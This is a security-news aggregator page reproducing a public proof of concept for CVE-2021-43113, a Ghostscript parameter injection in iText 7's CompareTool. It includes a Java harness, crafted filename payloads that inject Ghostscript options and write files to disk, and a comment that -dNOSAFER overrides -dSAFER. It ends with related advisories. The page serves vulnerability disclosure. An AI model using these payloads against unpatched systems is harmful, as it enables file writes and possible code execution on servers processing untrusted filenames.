Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-43113: iTextPDF7 Parameter Injection PoC - Pastebin.com

iTextPDF in iText 7 and up to 7.1.17 allows command injection via a CompareTool filename that is mishandled on the gs (aka Ghostscript) command line in GhostscriptHelper.java.

CVE
Open in Source
#vulnerability#git#java#pdf

a guest

Nov 14th, 2021

5,010

0

Never

Not a member of Pastebin yet? Sign Up, it unlocks many cool features!

  1. /*

  2. Title: iTextPDF7 Java Ghostscript Parameter Injection

  3. Software: iTextPDF7 (Java version)

  4. Version: <7.1.17

  5. Vulnerability: Parameter Injection

  6. Credits: Gabriele Zuddas (gzuddas[_@t_]mentat.is)

  7. Description: An attacker controlling the filename passed to the CompareTool class, is able to inject arbitrary parameters in the command line being executed (ghostscript). The vulnerable code resides inside the com/itextpdf/io/util/GhostscriptHelper.java.

  1. Notes: Vendor quickly acknowledged and fixed the vulnerability starting from version 7.1.17 (https://github.com/itext/itext7/releases/tag/7.1.17)

  2. */

  1. //To compile: javac -cp “.:*” Example.java

  2. //PoC Payload: ITEXT_GS_EXEC=/usr/bin/gs java -cp “.:*” Example 'a.pdf" -sstdout=hi.txt # '

  1. import com.itextpdf.kernel.utils.CompareTool;

  2. //Parameter injection: javac -cp “.:*” Example.java; ITEXT_GS_EXEC=/usr/bin/gs java -cp “.:*” Example “a.pdf\\\” -?"

  3. // javac -cp “.:*” Example.java; ITEXT_GS_EXEC=/usr/bin/gs java -cp “.:*” Example “xxx.pdf\” - \0"

  1. public class Example {

  2. public static void main(String args[]) throws Exception {

  3.    CompareTool c \= new CompareTool();

  4.    c.compareVisually("a.pdf", args\[0\],  ".", ".", null);

  5. }

  6. }

  1. //$ITEXT_GS_EXEC -dSAFER -dNOPAUSE -dBATCH -sDEVICE=png16m -r150 -sOutputFile="./cmp_xxx.pdf" - yyyyy-%03d.png" “xxx.pdf” - yyyyy"
  1. //-dNOSAFER overrides -dSAFER

  1. //javac -cp “.:*” Example.java; ITEXT_GS_EXEC=/usr/bin/gs java -cp “.:*” Example “xxx.pdf\” -sstdout=a.txt"

  2. //DROPS a file called ‘a.txt-%03d.png\ xxx.pdf\ -sstdout=a.txt’ on the filesystem

Related news

CVE-2023-22062: Oracle Critical Patch Update Advisory - July 2023

Vulnerability in the Oracle Hyperion Financial Reporting product of Oracle Hyperion (component: Repository). The supported version that is affected is 11.2.13.0.000. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Hyperion Financial Reporting. While the vulnerability is in Oracle Hyperion Financial Reporting, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Hyperion Financial Reporting accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Hyperion Financial Reporting. CVSS 3.1 Base Score 8.5 (Confidentiality and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L).

Debian Security Advisory 5323-1

Debian Linux Security Advisory 5323-1 - It was discovered that the CompareTool of iText, a Java PDF library which uses the external ghostscript software to compare PDFs at a pixel level, allowed command injection when parsing a specially crafted filename.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE